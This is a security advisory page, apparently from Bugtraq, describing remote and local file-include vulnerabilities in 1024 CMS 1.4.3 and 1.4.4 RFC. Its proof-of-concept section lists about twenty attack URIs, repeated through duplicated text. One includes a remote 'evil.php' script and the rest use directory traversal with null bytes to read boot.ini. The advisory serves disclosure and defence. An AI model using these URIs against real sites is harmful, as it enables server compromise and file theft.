1024 CMS Multiple Remote and Local File Include Vulnerabilities
BID:30091
Info
1024 CMS Multiple Remote and Local File Include Vulnerabilities
| Bugtraq ID: | 30091 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 04 2008 12:00AM |
| Updated: | Feb 06 2009 10:18PM |
| Credit: | Digital Security Research Group |
| Vulnerable: |
Treble Designs 1024 CMS 1.4.4 RFC Treble Designs 1024 CMS 1.4.3 |
| Not Vulnerable: | |
Discussion
1024 CMS Multiple Remote and Local File Include Vulnerabilities
1024 CMS is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to execute local script code in the context of the application or to execute remote scripts in the context of the webserver process. This may allow the attacker to access sensitive information that may aid in further attacks or to compromise the application.
1024 CMS 1.4.3 and 1.4.4 RFC are vulnerable; other versions may also be affected.
1024 CMS is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues using directory-traversal strings to execute local script code in the context of the application or to execute remote scripts in the context of the webserver process. This may allow the attacker to access sensitive information that may aid in further attacks or to compromise the application.
1024 CMS 1.4.3 and 1.4.4 RFC are vulnerable; other versions may also be affected.
Exploit / POC
1024 CMS Multiple Remote and Local File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[installdir]/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php
http://www.example.com/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/en/moderator/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/fr/moderator/default.php?t=download&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/de/moderator/default.php?t=forum&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/add.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/newest.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/forum/default/content.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00
The following exploit code is available:
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/[installdir]/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php
http://www.example.com/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/en/moderator/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/fr/moderator/default.php?t=download&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/de/moderator/default.php?t=forum&lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/add.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/newest.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/forum/default/content.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00
The following exploit code is available:
Solution / Fix
1024 CMS Multiple Remote and Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
1024 CMS Multiple Remote and Local File Include Vulnerabilities
References:
References:
- 1024 CMS Homepage (Treble Designs)
- [DSECRG-08-027] Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC ("Digital Security Research Group \[DSecRG\]"